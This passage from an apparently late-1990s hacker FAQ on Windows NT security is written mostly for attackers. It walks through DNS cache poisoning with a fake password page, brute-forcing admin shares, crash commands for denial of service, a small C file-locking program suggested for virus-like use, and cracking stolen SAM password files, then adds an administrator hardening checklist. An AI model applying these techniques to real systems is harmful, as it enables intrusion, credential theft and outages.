05-7. What about forging DNS packets for subversive purposes? Sure. ;-) By forging UDP packets, NT name server caches can be compromised. If recursion is allowed on the name server, you can do some nasty things. Recursion is when a server receives a name server lookup request for a zone or domain for which is does not serve. This is typical how most setups for DNS are done. So how do we do it? We will use the following example: We are root on ns.nmrc.org, IP 10.10.10.1. We have pirate.nmrc.org with an address of 10.10.10.2, and bait.nmrc.org with an address of 10.10.10.3. Our mission? Make the users at lame.com access pirate.nmrc.org when they try to access www.lamer.net. Okay, assume automation is at work here to make the attack smoother... - DNS query is sent to ns.lame.com asking for address of bait.nmrc.org. - ns.lame.com asks ns.nmrc.org what the address is. - The request is sniffed, and the query ID number is obtained from the request packet. - DNS query is sent to ns.lame.com asking for the address of www.lamer.net. - Since we know the previous query ID number, chances are the next query ID number will be close to that number. - We send spoofed DNS replies with several different query ID numbers. These replies are spoofed to appear to come from ns.lamer.net, and state that its address is 10.10.10.2. - pirate.nmrc.org is set up to look like www.lamer.net, except maybe it has a notice to "go to the new password page and set up an account and ID". Odds are this new password is used by that lame.com user somewhere else... With a little creativity, you can also do other exciting things like reroute (and make copies of) email, denial of service (tell lame.com that www.lamer.net doesn't exist anymore), and other fun things. Supposedly Service Pack 3 fixes this. --------------------------------------------------------------------------- 05-8. What about shares? The main thing to realize about shares is that there are a few that are invisible. Administrative shares are default accounts that cannot be removed. They have a $ at the end of their name. For example C$ is the administrative share for the C: partition, D$ is the administrative share for the D: partition. WINNT$ is the root directory of the system files. By default since logging is not enabled on failed attempts and the administrator doesn't get locked out from false attempts, you can try and try different passwords for the administrator account. You could also try a dictionary attack Once in, you can get at basically anything. --------------------------------------------------------------------------- 05-9. How do I get around a packet filter-based firewall? If the target NT box is behind a firewall that is doing packet filtering (which is not considered firewalling by many folks) and it does not have SP3 loaded it is possible to send it packets anyway. This involves sending decoy IP packet fragments with specially crafted headers that will be "reused" by the malicious IP packet fragments. This is due to a problem with the way NT's TCP/IP stack handles reassembling fragmented packets. As odd as this sounds, example code exists to prove it works. See the web page at http://www.dataprotect.com/ntfrag for details. How does it bypass the packet filter? Typically packet filtering only drops the fragmented packet with the offset of zero in the header. The example source forges the headers to get around this, and NT happily reassembles what does arrive. --------------------------------------------------------------------------- Section 06 File and Directory Access --------------------------------------------------------------------------- 06-1. How is file and directory security enforced? Since files and directories are considered objects (same as services), the security is managed at an "object" level. An access-control list (ACL) contains information that controls access to an object or controls auditing of attempts to access an object. It begins with a header contains information pertaining to the entire ACL, including the revision level, the size of the ACL, and the number of access-control entries (ACEs) in the list. After the header is a list of ACEs. Each ACE specifies a trustee, a set of access rights, and flags that dictate whether the access rights are allowed, denied, or audited for the trustee. A trustee can be a user account, group account, or a logon account for a service program. A security descriptor can contain two types of ACLs: a discretionary ACL (DACL) and a system ACL (SACL). In a DACL, each ACE specifies the types of access that are allowed or denied for a specified trustee. An object's owner controls the information in the object's DACL. For example, the owner of a file can use a DACL to control which users can have access to the file, and which users are denied access. If the security descriptor for an object does not have a DACL, the object is not protected and the system allows all attempts to access the object. However, if an object has a DACL that contains no ACEs, the DACL does not grant any access rights. In this case, the system denies all attempts to access the object. In a SACL, each ACE specifies the types of access attempts by a specified trustee that cause the system to generate audit records in the system event log. A system administrator controls the information in the object's SACL. An ACE in a SACL can generate audit records when an access attempt fails, when it succeeds, or both. To keep track of the individual object, a Security Identifier (SID) uniquely identify a user or a group. A SID contains: - User and group security descriptors - 48-bit ID authority - Revision level - Variable subauthority values A privilege is used to control access to a service or object more strictly than is normal with discretionary access control. Privileges provide access to services rarely needed by most users. For example, one type of privilege might give access for backups and restorals, another might allow the system time to be changed. --------------------------------------------------------------------------- 06-2. What is NTFS? NTFS is the Windows NT special file system. This file system is tightly integrated into Windows security -- it is what allows access levels to be set from the directory down to individual files within a directory. --------------------------------------------------------------------------- 06-3. Are there are vulnerabilities to NTFS and access controls? Not so much vulnerabilities as there are quirks -- quirks that can be exploited to a certain degree. For example, let's say the system admin has built a home directory for you on the server, but has disallowed the construction of directories or files that you wish to make available to the group Everyone. You are wanting to make this special directory so that you can easily retrieve some hack tools but you are cut off. However, if the sys admin left you as the owner of the home directory, you can go in and alter its permissions. This is because as long as you are the owner or Administrator you still control the file. Oh sure, you may get a few complaints from the system when you are doing it, but it can be done. Since NTFS has security integrated into it, there are not too many ways around it. The main one requires access to the physical system. Boot up the system on a DOS diskette, and use NTFSDOS.EXE. It will allow you to access an NTFS volume bypassing security. The last quirk is that if you have a directory with Full Control instead of RWXDPO permissions, then you get a hidden permission called File Delete Child. FDC cannot be removed. This means that all members of the group Everyone can delete any read-only file in the directory. Depending on what the directory contains, a hacker can replace a file with a trojan. --------------------------------------------------------------------------- 06-4. What is Samba and why is it important? Samba is a freeware app developed by Andy Tridgell. It is a great tool for helping integrate Unix into Microsoft Windows and Lan Manager environments. The main idea is that you can, with Samba, allow a Unix machine to access file and directories. The other handy thing about Samba is that like most Unix freeware you get the source code. Most hackers seem to have Linux up and running, so loading up Samba allows you several tactical advantages. A number of the exploits described here require access to a privileged port (< 1024). If you are root on your own Linux box, you can start exploits from those needed ports. A lot of the tests in the NMRC lab were conducted using Samba. In fact when World Star Holdings Ltd in Canada had their lame Cybertest '96 contest on June 12th, yours truly used Samba to break in (but I wasn't first). Samba talks SMB and can directly access Windows NT hardware, and Hobbit (hobbit@avian.org) has put together a very interesting paper entitled "CIFS: Common Insecurities Fail Scrutiny". It is highly recommended reading for admins and hackers alike. Included in the paper are details and source patches to allow easier attacking on NT. Studying the source code of Samba taught me a lot, but Hobbit's paper puts everything in a whole new light. It provides some well documented basics on how a lot of the communications work, detailing exactly WHY certain protocols and behaviours are vulnerable to abuse. Get Samba and read its documentation. Read Hobbit's paper and apply the patches. Period. --------------------------------------------------------------------------- 06-5. I hack remotely. Once in, how can I do all that GUI stuff? The main problem is adjusting NT file security attributes. Some utilities are available with NT that can be used, but I'd recommend using the NT Command Line Security Utilities. They include: saveacl.exe - saves file, directory and ownership permissions to a file restacl.exe - restores file permissions and ownership from a saveacl file listacl.exe - lists file permissions in human readable format swapacl.exe - swaps permissions from one user or group to another grant.exe - grants permissions to users/groups on files revoke.exe - revokes permissions to users/groups on files igrant.exe - grants permisssions to users/groups on directories irevoke.exe - revokes permissions to users/groups on directories setowner.exe - sets the ownership of files and directories nu.exe - 'net use' replacement, shows the drives you're connected to The latest version can be found at ftp://ftp.netcom.com/pub/wo/woodardk/. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 07 Miscellaneous Info on NT --------------------------------------------------------------------------- 07-1. How do I bypass the screen saver? If a user has locked their local workstation using CTRL+ALT+DEL, and you can log in as an administrator, you will have a window of a few seconds where you will see the user's desktop, and even manipulate things. This trick works on NT 3.5 and 3.51, unless the latest service pack has been loaded. If the service pack has been loaded, but it's still 3.X, try the following. - From another NT workstation, type the following command: shutdown \\ /t:30 - This will start a 30 second shutdown on the target and a Security window will pop up. - Cancel the shutdown with the following command: shutdown \\ /a - The screen saver will kick back in. - Wiggle the mouse on the target. The screen will go blank. - Now do a ctrl-alt-del on the target. - An NT Security window will appear. Select cancel. - You are now at the Program Manager. --------------------------------------------------------------------------- 07-2. What can sniffing get me? If an older version of LANMAN is being used, passwords are sent plaintext (see section 10-02 for details). However, more common are shares that are passworded. Accessing these shares sends passwords in the clear. Any traditional protocols (FTP and telnet for example) that send passwords in the clear could be sniffed, and it is quite possible that a user's FTP password is the same as their regular NT account password. --------------------------------------------------------------------------- 07-3. How can I detect that a machine is in fact NT on the network? Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't expect that... Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not Windows 95, however. Using Samba you should be able to connect and query for the existence of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check \CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first as Everyone has read permissions here by default. Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used, certainly you can expect port 137 to be open if IP is anywhere in use around NT. Another possible indication is checking for port 139. This tells you your target is advertising an SMB resource to share info, but it could be any number of things, such as a Windows 95 machine or even Windows for Workgroups. These may not be entirely out of the question as potential targets, but if you are after NT you will have to use a combination of the aforementioned techniques coupled with some common sense. To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on remote systems. It is discussed more in detail in section 05-5. --------------------------------------------------------------------------- 07-4. Can I do on-the-fly disk encryption on NT? Try Shade. It allows you to create an encrypted disk device inside a file. This "device" can then be formatted using either NTFS or FAT and used as a regular disk. Shade encrypts on every write operation and decrypts on every read operation to this new device. Look for Shade at: http://softwinter.bitbucket.co.il/shade.html --------------------------------------------------------------------------- 07-5. Does the FTP service allow passive connections? I was playing around in the registry, looking for odd things, and found this strange entry under : If set to 1, you can do passive connections depending on the TCP port you use. A passive connection is where you can connect to FTP site alice.com, and from there connect to site bob.com. It is used by hackers because any odd connections at bob.com will appear in logs as coming from alice.com. Most typical is a port scan. A port scanner for doing this from a Unix box can be found at: http://www.nmrc.org/files/unix/ftp-scan.c --------------------------------------------------------------------------- 07-6. What is this "port scanning" you are talking about? Port scanning is a technique to check TCP/IP ports to see what services are available. For example port 80 is typically a web server, port 25 is SMTP used by Internet mail and so on. By scanning and seeing what TCP/IP ports are listening at the end of a TCP/IP address, you can get an idea as to what type of box the target might be, what services are available, and possibly plan an attack if you are aware of an exploit involving a particular service. If port 135, 137, 138, and 139 are open on the target of a scan, it is quite possible that the target is NT (although it could be Win95 or even WFW 3.11, see section 07-3 above). Port scanners are widely available for a variety of different platforms. Check section 10-5 for the location of several. --------------------------------------------------------------------------- 07-7. Does NT have bugs like Unix' sendmail? If the server is running a POP3 server like Exchange, you can use a brute force technique to guess passwords. Odds are that the sys admin is not logging or looking at logs for this stuff. In particular, if you are dealing with a sys admin that isn't used to the wild and wooly Unix world, it may not even occur to the admin to look. This is something that NT folks are just now having to face, whereas their Unix admin counterparts have had to maintain this level of scrutiny for a while. --------------------------------------------------------------------------- Section 08 Denial of Service --------------------------------------------------------------------------- 08-1. What is "Denial of Service"? Denial of Service (DOS) is simply rendering a service offered by a workstation or server unavailable to others. This is a controversial subject, since some people think that DOS is not a hack, or rather juvenile and petty. While I can't think of very many reasons why you might want to engage in DOS, I still will continue to include this type of material in Hack FAQs. What is more sad -- the fact that I include them, or the fact that there are so many of them? Reasons that a hacker might want to resort to DOS might include the following: - A trojan has been installed, but a reboot is required to activate it. - A hacker wishes to cover their tracks VERY DRAMATICALLY, or cover CPU activity with a random crash to make the site think it was "just a fluke". - The hacker isn't a hacker at all, but a pissed off lamer who has a poor outlook and too much free time. - The hacker is acting out of the need (or delusion) that the DOS serves a greater good, such as a DOS attack on Pro Life sites by Pro Choice believers. Reasons that a Sys Admin might use DOS: - A Sys Admin may want to ensure that their site is NOT vulnerable by testing out the latest patch. - A Sys Admin has a runaway process on a server causing problems and cannot physically access the box (I did this once). - The Sys Admin isn't a Sys Admin at all, but a pissed off lamer who has a poor outlook and too much free time. --------------------------------------------------------------------------- 08-2. What is the Ping of Death? The Ping of Death is a large ICMP packet sent by a workstation to a target. The target receives the ping in fragments and starts reassembling the packet. However, due to the size of the packet once it is reassembled it is too big for the buffer and overflows it. This causes unpredictable results, such as reboots or hangs. Windows 95 and Windows NT are capable of sending such a packet. By simply typing in "ping -16527 -s 1 " you can send such a ping. There are also source code examples available for Unix platforms that allow large ping packets to be constructed. These sources are freely available on the Internet. Only NT 3.51 WITHOUT the latest service pack is vulnerable. NT 4.0 does not seem to suffer from Ping of Death. --------------------------------------------------------------------------- 08-3. What is a SYN Flood attack? In the TCP/IP protocol, a three way handshake takes place as a service is connected to. First in a SYN packet from the client, with which the service responses with a SYN-ACK. Finally the client responds to the SYN-ACK and the conversation is considered started. A SYN Flood attack is when the client does not response to the SYN-ACK, tying up the service until the service times out, and continues to send SYN packets. The source address of the client is forged to a non-existant host, and as long as the SYN packets are sent faster than the timeout rate of the TCP stack waiting for the time out, the resources of the service will be tied up. This is a simplified version of what exactly happens. For more elaborate details and sample Linux code for creating a flood, see Phrack 48 file 13 by daemon9. Windows NT 3.51 is vulnerable unless a new version of drivers have been loaded. Version 4.0 requires the latest service pack. --------------------------------------------------------------------------- 08-4. What can telnet give me in the way of denial of service? There are several DOS attacks involving a simple telnet client that can be used against an NT server. First, by telnetting to port 53, 135, or 1031, and then typing in about 10 or so characters and hitting enter will cause problems. If DNS (port 53) is running, DNS will stop. If 135 answers, the CPU utilization will increase to 100%, slowing performance. And if port 1031 is hit, IIS will get knocked down. Typically the fix is to reboot the server, as it will be hung or so slow as to render it useless. Telnetting to port 80 and typing "GET ../.." will also crash IIS. If the latest service pack is loaded the attack will not work. --------------------------------------------------------------------------- 08-5. What can I do with Samba? Don't get me started ;-) As far as DOS, if you connect to a server with Samba to 3.X NT that does not have the latest service pack loaded, you can send it "DIR ..\" and crash it. For a little bit on Samba, see section 06-4. --------------------------------------------------------------------------- 08-6. How do I lock out others from files? Consider a variation of this source being added to a virus-like program: /* lock.c written by Paul Ashton */ #include void main(int ac, char *av[]) { HANDLE fp; fp = CreateFile(av[1], FILE_READ_DATA, 0, 0, OPEN_EXISTING, 0, 0); if (fp == INVALID_HANDLE_VALUE) exit(GetLastError()); Sleep(60000); exit(0); } Passing a file name to the above code will lock it for 60 seconds. Imagine an intruder locking various components of a logging facility from a limited use account to attack the Administrator... --------------------------------------------------------------------------- 08-7. What's with ROLLBACK.EXE? If the file ROLLBACK.EXE is executed, the registry can be wiped. You must re-install or do a complete restore if this happens to you. Sys Admins will probably want to remove this file. Renamed, it makes for one hell of a nasty trojan. It is reportedly possible to lock onto a port, say like port 19, and when the server crashes and comes up ROLLBACK.EXE will start trying to unlock the port and subsequently opens up the registry for anyone to wipe it. I was unsuccessful in getting this to happen in the lab, but probably because I find DOS attacks rather lame I didn't try very hard to get it to work. But others claim it can happen, so keep it in mind. --------------------------------------------------------------------------- 08-8. What is an OOB attack? This attack is fairly simple, and a fair amount of source code is available. Basically it involves sending an out-of-band message to a Windows operating system. Typically port 139 is used. This was patched with SP3 and a Hot Fix but apparently with a little monkeying around with the code you can get around this. This DOS is very popular, mainly because of the wide variety of implementations of sockets. I've seen Unix and Windows NT versions of code, an implementation in Perl, and even an implementation using the Rexx Socket APIs on OS/2. If you are so inclined, try a web search for "winnuke" which will get you probably a thousand locations with the code. --------------------------------------------------------------------------- 08-9. Are there any other denial of service attacks? If a domain user logs onto the console, creates a file and removes its permissions, it is possible that another user can log onto the console and delete the file. Microsoft is working on a patch. The problem affects all versions of NT. However, this isn't what I'd consider "denial of service" as it is more like denial of a file. Depending on the file, though, it could be used as DOS. See the last paragraph of section 06-3 for details. If you are running smbmount with version 2.0.25 of Linux, you can crash an NT server. smbmount is intended to be run on Linux 2.0.28 or higher, so it doesn't work right on 2.0.25. You also need a legit user account. Running as root, type smbmount //target/service /mnt -U client_name, followed by ls /mnt will hang the shell on Linux (no biggie) and blue screen the target server (biggie). The final DOS I'm aware of involves Microsoft's DNS on NT 4.0 server. If you send it a DNS response when it did not make a query, DNS will crash. The latest service pack fixes this problem. --------------------------------------------------------------------------- Section 09 The Registry --------------------------------------------------------------------------- 09-1. What is the Registry? The Registry is the central core registrar for Windows NT. Each NT workstation for server has its own Registry, and each one contains info on the hardware and software of the computer it resides on. For example, comm port definitions, Ethernet card settings, desktop setting and profiles, and what a particular user can and cannot do are stored in the Registry. Remember those ugly system INI files in Windows 3.1? Well, they are all included with even more fun stuff into one big database called the Registry in NT. Of interest to hackers is the fact that all access control and assorted parameters are located in the Registry. While I'm tempted to discuss just that portion of the Registry, I'll briefly cover everything for completeness but put the fun stuff up front. The Registry contains thousands of individual items of data, and are grouped together into "keys" or some type of optional value. These keys are grouped together into subtrees -- placing like keys together and making copies of others into separate trees for more convenient system access. The Registry is divided into four separate subtrees. These subtrees are called HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, and HKEY_USERS. We'll go through them from most important to the hacker to least important to the hacker. First and formost is the HKEY_LOCAL_MACHINE subtree. It contains five different keys. These keys are as follows: SAM and SECURITY - These keys contain the info such as user rights, user and group info for the domain (or workgroup if there is no domain), and passwords. In the NT hacker game of capture the flag, this is the flag. Bag this and all bets are off. The keys are binary data only (for security reasons) and are typically not accessible unless you are an Administrator or in the Administrators group. It is easier to copy the data and play with it offline than to work on directly. This is discussed in a little more detail in section 09-4. HARDWARE - this is a storage database of throw-away data that describes the hardware components of the computer. Device drivers and applications build this database during boot and update it during runtime (although most of the database is updated during the boot process). When the computer is rebooted, the data is built again from scratch. It is not recommended to directly edit this particular database unless you can read hex easily. There are three subkeys under HARDWARE, these are the Description key, the DeviceMap key, and the ResourceMap key. The Description key has describes each hardware resource, the DeviceMap key has data in it specific to individual groups of drivers, and the ResourceMap key tells which driver goes with which resource. SYSTEM - This key contains basic operating stuff like what happens at startup, what device drivers are loaded, what services are in use, etc. These are split into ControlSets which have unique system configurations (some bootable, some not), with each ControlSet containing service data and OS components for that ControlSet. Ever had to boot from the "Last Known Good" configuration because something got hosed? That is a ControlSet stored here. SOFTWARE - This key has info on software loaded locally. File associations, OLE info, and some miscellaneous configuration data is located here. The second most important main key is HKEY_USERS. It contains a subkey for each local user who accesses the system, either locally or remotely. If the server is a part of a domain and logs in across the network, their subkey is not stored here, but on a Domain Controller. Things such as Desktop settings and user profiles are stored here. The third and fourth main keys, HKEY_CURRENT_USER and HKEY_CLASSES_ROOT, contain copies of portions of HKEY_USERS and HKEY_LOCAL_MACHINE respectively. HKEY_CURRENT_USER contains exactly would you would expect, a copy of the subkey from HKEY_USERS of the currently logged in user. HKEY_CLASSES_ROOT contains a part of HKEY_LOCAL_MACHINE, specifically from the SOFTWARE subkey. File associations, OLE configuration and dependency information. --------------------------------------------------------------------------- 09-2. What are hives? Hives are the major subdivisions of all of these subtrees, keys, subkeys, and values that make up the Registry. They contains "related" data. Look, I know what you might be thinking, but this is just how Microsoft divided things up -- I'm just relaying the info, even I don't know exactly what all the advantages to this setup are. ;-) All hives are stored in %systemroot%\SYSTEM32\CONFIG. The major hives and their files are as follows: Hive File Backup File --------------------------- ------ ------------ HKEY_LOCAL_MACHINE\SOFTWARE SOFTWARE SOFTWARE.LOG HKEY_LOCAL_MACHINE\SECURITY SECURITY SECURITY.LOG HKEY_LOCAL_MACHINE\SYSTEM SYSTEM SYSTEM.LOG HKEY_LOCAL_MACHINE\SAM SAM SAM.LOG HKEY_CURRENT_USER USERxxx USERxxx.LOG ADMINxxx ADMINxxx.LOG HKEY_USERS\.DEFAULT DEFAULT DEFAULT.LOG Hackers should look for the SAM file, with the SAM.LOG file as a secondary target. This contains the password info. --------------------------------------------------------------------------- 09-3. Why is the Registry like this and why do I care? Who the hell knows why it's this way? ;-) The main reason is a step towards central administration and combining all that crap from SYSTEM.INI, WIN.INI, and other "legacy" Windows 3.x config stuff into one database. Then nice and neat individual GUI applications could be used to manipulate the data contained inside. And with the idea of a "domain" there are some "centralized" functionalities that are a little more convenient. Is it better than Windows 3.x? This is debatable, although in my personal opinion I'd say yes. Were the design functions met? Probably not. While the Registry tries to be all things to all subcomponents of a domain, it does tend to smell like there were too many cooks in Microsoft's kitchen and simply not enough spoons. Some functions seem to be well suited for the Registry, some not. It is certainly not "portable" like Novell's NDS, that is you will probably never find the Registry running on a Unix system, whereas Novell's NDS is a much simpler design and is quite portable. Both schemes have their place -- NDS does not contain or manage OS info at the Desktop level and the Registry does. Who wins? My guess is the people currently offering training classes in any modern OS are probably loving this because it is so complex, therefore it is guaranteed income. And hackers also win, because this is a complex environment where one wrong parameter setting or one Hot Fix not loaded could mean free and easy access. My main advice to hackers is to play around with the Registry before the attack, because as you go further and further into an NT environment, you stand more chances of screwing things up, which is an easy way to make yourself known. --------------------------------------------------------------------------- 09-4. What do I do with a copy of SAM? You get passwords. First use a copy of SAMDUMP.EXE to extract the user info out of it. You do not need to import this data into the Registry of your home machine to play with it. You can simply load it up into one of the many applications for cracking passwords, such as L0phtCrack. See section 3 for more info on NT passwords and cracking them. --------------------------------------------------------------------------- Section 10 Resources --------------------------------------------------------------------------- 10-1. What are some NT WWW locations? While there are dozens of WWW sites with information, here is a list of some that deal mainly with NT Security, or with some of the tools discussed in this FAQ. WWW: http://www.somarsoft.com/ http://www.ntsecurity.com/ http://listserv.ntbugtraq.com/ http://www.ntresearch.com/ http://www.ntinternals.com/ http://www.intrusion.com/ http://www.iss.net/ http://samba.anu.edu.au/pub/samba/samba.html http://home.eunet.no/~pnordahl/ntpasswd/ http://www.dataprotect.com/ntfrag/ FTP: ftp://ftp.netcom.com/pub/wo/woodardk --------------------------------------------------------------------------- 10-2. What are some NT USENET groups? Tons o' newsgroups.... NT Security: comp.os.ms-windows.nt.admin.security Security in general: comp.security.announce comp.security.firewalls comp.security.misc NT in general: comp.os.ms-windows.networking.misc comp.os.ms-windows.networking.ras comp.os.ms-windows.networking.tcp-ip comp.os.ms-windows.networking.win95 comp.os.ms-windows.networking.windows comp.os.ms-windows.nt.admin.misc comp.os.ms-windows.nt.admin.networking comp.os.ms-windows.nt.advocacy comp.os.ms-windows.nt.announce comp.os.ms-windows.nt.misc comp.os.ms-windows.nt.pre-release comp.os.ms-windows.nt.setup.hardware comp.os.ms-windows.nt.setup.misc comp.os.ms-windows.nt.software.backoffice comp.os.ms-windows.nt.software.compatibility comp.os.ms-windows.nt.software.services comp.os.ms-windows.programmer.networks comp.os.ms-windows.programmer.nt.kernel-mode Web stuff where NT could be mentioned: comp.infosystems.www.authoring.cgi comp.infosystems.www.servers.misc comp.infosystems.www.servers.ms-windows Microsoft's newsgroups: microsoft.public.windowsnt.40beta microsoft.public.windowsnt.apps microsoft.public.windowsnt.domain microsoft.public.windowsnt.dsmnfpnw microsoft.public.windowsnt.fsft microsoft.public.windowsnt.mac microsoft.public.windowsnt.mail microsoft.public.windowsnt.misc microsoft.public.windowsnt.print microsoft.public.windowsnt.protocol.misc microsoft.public.windowsnt.protocol.ras microsoft.public.windowsnt.protocol.tcpip microsoft.public.windowsnt.setup --------------------------------------------------------------------------- 10-3. What are some NT mailing lists? The NT-security mailing list: To subscribe, send a message with SUBSCRIBE in the body to ntsecurity-request@iss.net. NT-BugTraq: Like the BugTraq list, this is a full disclosure list. Send "subscribe ntbugtraq firstname lastname" (without the quotes) in the body of a message to listserv@ntbugtraq.com. --------------------------------------------------------------------------- 10-4. Where are some other NT Security FAQs? The NT Security FAQ -- geared toward administrators: http://www.it.kth.se/~rom/ntsec.html --------------------------------------------------------------------------- 10-5. Where can I get the files mentioned in this FAQ? Archive What Is It Where Is It ---------------- ---------------- ----------------------------------------- c50a-nt-0.20.tgz Crack 5.0 for NT http://www.nmrc.org/files/snt/ cifs.txt Hobbit's NetBios http://199.103.168.8:2001/web1/hak/cifs.txt Paper lc15src.tar.gz L0phtcrack 1.5 \ for Unix \ lc15exe.zip L0phtcrack 1.5 \ ftp://dot.ishboo.com/l0pht/ for DOS/NT / http://www.nmrc.org/files/snt/ lc15src.zip L0phtcrack 1.5 / DOS/NT source / windowsnt.tgz Netbios Auditing ftp://ftp.secnet.com/pub/tools/ Tool 1.0 ncnt090.zip Netcat for NT http://www.nmrc.org/files/nt/ netmonex.tgz NetMon Exploit http://www.nmrc.org/files/nt/ NTCrack.tar.gz NT Crack 2.0 http://www.nmrc.org/files/snt/ ntfsdos.zip NTFS Access http://www.nmrc.org/files/nt/ passwd.zip Passwd http://wwwthep.physik.uni-mainz.de/~frink pwdump.exe Password Dump http://www.nmrc.org/files/snt/ samba-* Samba ftp://samba.anu.edu.au/pub/samba/ smbfs-2.0.1.tgz smbmount sunsite.unc.edu/pub/Linux/filesystems/smbfs tpu.zip Therion's http://www.nmrc.org/files/msdos/ Password Utility --------------------------------------------------------------------------- 10-6. Where can I find Service Packs and Hot Fixes? The main location for Service Packs can be found at ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/xxx/yyy/zzz where xxx is the country, yyy is the NT version, and zzz is the Service Pack. For example, this is the address for the USA version of Service Pack 3 for NT 4: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/ussp3 The main location for Hot Fixes can be found at ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/xxx/yyy/zzz where xxx is the country, yyy is the NT version, and zzz is the Hot Fix directory. For example, this is the address for the USA versions of Hot Fixes for NT 4 if Service Pack 3 is already installed: ftp://ftp.microsoft.com /bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3 --------------------------------------------------------------------------- Section 11 Mathematical/Theoretical --------------------------------------------------------------------------- 11-1. Can sessions be hijacked? In theory, however no one has yet coded the exploit. It would involve a complex spoofing job where not only would the session have to be hijacked at the transport level (getting all of the ACK/NACK numbering correct), but the tree ID (TID) and user ID (UID) would have to be spoofed at the redirector and server level respectively. We are talking SMB at this point. A more likely session to be hijacked would be a telnet session to an NT server, but this applies to any straight telnet session, NT or not, and is beyond the scope of this FAQ. For more information refer to http://www.nmrc.org/files/unix/ip-exploit.txt. --------------------------------------------------------------------------- 11-2. Are "man in the middle" attacks possible? Ealry versions of LANMAN send the password in the clear -- which is definately sniffer-bait. But the challenge/response authentication used by LANMAN 2.1 and earlier is subject to possible attack -- namely a plaintext attack. Since the challenge is plaintext, an attacker can acquire known plaintext/ciphertext pairs. Offline, the attacker can then test a guess at a password by using it to generate a key, encrypting the plaintext, and comparing it to the corresponding ciphertext. If it matches, the password is compromised. Since case doesn't matter, a brute force attack is theoretically possible against plaintext/ciphertext pair obtained via a known plaintext attack. However, this is simply offline attacking. A true man-in-the-middle attack allows a third party to intercept and replace components of the challenge/response conversation with their own, acquiring the password or even taking over the session itself. However, the easier of the two is getting the password. By catching the start of a conversation and forging the challenge, the client would response with the response to the server, and the attacker would know a part of the equation, shortening the time and effort needed to break the plaintext/ciphertext pair. By "precompiling" a list of response/password pairs, the password could be determined even quicker. NT LM 0.12 uses MD4 to generate keying material, and since upper and lower case are allowed, the full 56 bits allowed by DES can be used. This does not eliminate the problem -- it simply increases the difficulty of brute force against a plaintext/ciphertext pair. However this does nothing towards a realtime attack. The best method would be as follows: - Client starts a session. - Attacker sees this session, and waits for the response from the server. - Server sends the response and the Attacker grabs it. - Attacker removes the SMB_COM_NEGPROT bit and sends it to the Client. - Client receives the Attacker's packet, and now assumes a plaintext password should be used. - Client receives the real packet from the server, but ignores it thinking it is a dupe. - Client sends the password in plaintext. - Attacker grabs the password and now logs into the Server directly. - Client times out or gets an error, and figures a network error has occurred. Client tries to log in again. It is also possible in theory to catch the session before the authentication process even starts. For example: - Client starts a session, and sends a request to the DNS server to resolve a host name. - Attacker sees this request, and forges a reply that the Attacker's IP address is the address for the host the Client is requesting. - Attacker sends request to DNS server cancelling Client's request. - Client starts to log into Attacker. - Attacker tells Client to send the password as plaintext. - Client complies, and Attacker proceeds to login to original host that the Client was asking the DNS server about. - Attacker kills the session with the Client, and the Client thinks an error has occurred, and tries again. This attack has been partially implemented with the c2myazz file, which forces a plaintext login. --------------------------------------------------------------------------- 11-3. What about TCP Sequence Number Prediction? Refer to section 11-1. This is possible, but unlikely, on anything requiring the TID and UID as a part of the spoof. TCP Sequence Number Prediction involves guessing what the TCP numbering sequence is, and inserting packets to (typically) execute commands on the target host with the proper sequence number. --------------------------------------------------------------------------- Section 12 For Administrators Only --------------------------------------------------------------------------- 12-1. How do I secure my server? - Upgrade to NT 4.0 and install the latest service pack. - Physically secure all servers. - Disable remote logins to workstations. - No dual booting. NT only on the harddrives, and format NTFS only. - Remove the group Everyone from being able to read so much of the registry. - Use Auditing. Heavily if Internet connected. - Make sure program file directories have just Read and Execute permissions. Try to separate public files from private files. - Note the owners of directories. The owner can still change things inside a directory, despite permissions being reset. - Go into User Manager and create a restrictive password policy. - Disable the Last Logon username display. - Add the domain administrator's global group to all of your workstation's local administrator group for control. - Restrict access to certain executables you deem dangerous (possibly CMD.EXE or NTBACKUP.EXE if you are real paranoid). - Re-read this FAQ and note every time you see "this attack won't work if the Sys Admin did..." and actually do it. - Use a firewall. As a minimum, do not allow outside access to ports 135 through 139 for both TCP and UDP. - Put web, ftp, and any other public servers OUTSIDE the firewall, or in a DMZ between a couple of firewalls. - Come to think of it, read a book on firewalls. - Consider using "internal" firewalls if you need to secure certain servers from certain groups of users, i.e. protect the accounting server from the disgruntled marketing group. - Read your logs. Daily. Use them as a guide, however don't blindly trust that every action is in the logs, and every action reflected in the logs is to be taken at face value. INVESTIGATE ODD THINGS. - Run C2Config after you have adjusted the INF file to meet your needs. - Regularly run virus scans, non-Microsoft-written security scanners, and your C2Config utility (if you initially used it). - Subscribe to the mailing lists and read the newsgroups listed in section 10. Daily. Read the NT Security FAQ. Repeatedly. Read all the pages at www sites listed in section 10. Frequently. - Read Hobbit's paper on CIFS. If it's too technical, hire a new Sys Admin. - Don't panic, but be paranoid all the time. Take every security concern or oddball alert seriously. --------------------------------------------------------------------------- 12-2. I'm an idiot. Exactly how do hackers get in? I mentioned the World Star Holdings Inc. Cybertest '96 contest earlier in the FAQ. I wish I could say that this contest involved some type of massive attack rich in color and unbelievable hacking genius, but alas, it was too easy. Using techiques outlined in this FAQ, I simply got a list of exported shares and logged in as GUEST. I enjoyed trying to get past the special HTML scripting language they were using, and only did it because I wanted the $50,000.00 prize money. But I wasn't the first one in, and they changed the rules mid-contest anyway. Here's a scenario that pulls some of this together. The Exploit ----------- The attacker has a copy of Samba on his Linux machine, and applied the patches from Hobbit's paper making smbclient a little more dangerous. He starts looking at his target innocent.nmrc.org. Using a port scanner he determines that ports 135-139 are open, and suspects the box might be NT. The target IP address is 10.10.10.2. So he tries his hack version of nmblookup like so - nmblookup -B 10.10.10.2 -S \* The name INNOCENT is 